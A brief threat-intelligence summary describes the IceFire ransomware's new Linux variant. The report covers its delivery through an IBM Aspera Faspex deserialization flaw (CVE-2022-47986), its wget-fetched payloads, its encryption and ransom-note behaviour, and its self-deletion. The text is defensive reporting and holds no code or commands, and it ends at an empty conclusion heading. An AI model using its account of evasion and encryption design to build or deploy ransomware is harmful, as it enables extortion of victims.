IceFire Operators Introduces Linux Variant, Abuse IBM Flaw

What was found?

• Attackers exploited a recently patched deserialization vulnerability (CVE-2022-47986) in IBM Aspera Faspex to deploy the IceFire ransomware.
• The latest IceFire variant is a 2.18 MB, 64-bit ELF binary compiled with GCC for AMD64 architecture.
• Its binary contains many statically linked functions from the legitimate OpenSSL library and hardcoded RSA public key.

Malware infection and hosting

• IceFire is deployed against CentOS hosts running a vulnerable version of Aspera Faspex. 
• The system downloads two payloads using wget and saves them to an Aspera subfolder.
• The payloads are hosted on a DigitalOcean droplet. 

Encryption and deleting traces

• IceFire encrypts the files on execution and appends the '.ifire' extension to the filename.
• It automatically drops a ransom note that contains a unique hardcoded username and password that the victim can use to log into the attackers' Tor-based ransom payment portal.
• Notably, IceFire avoids encrypting files with specific extensions pertaining to executables, applications, or system functionality. 
• It doesn’t encrypt all files on Linux and avoids specific paths, allowing critical system parts to remain operational.
• Finally, it deletes itself by removing the binary to cover its tracks.

Conclusion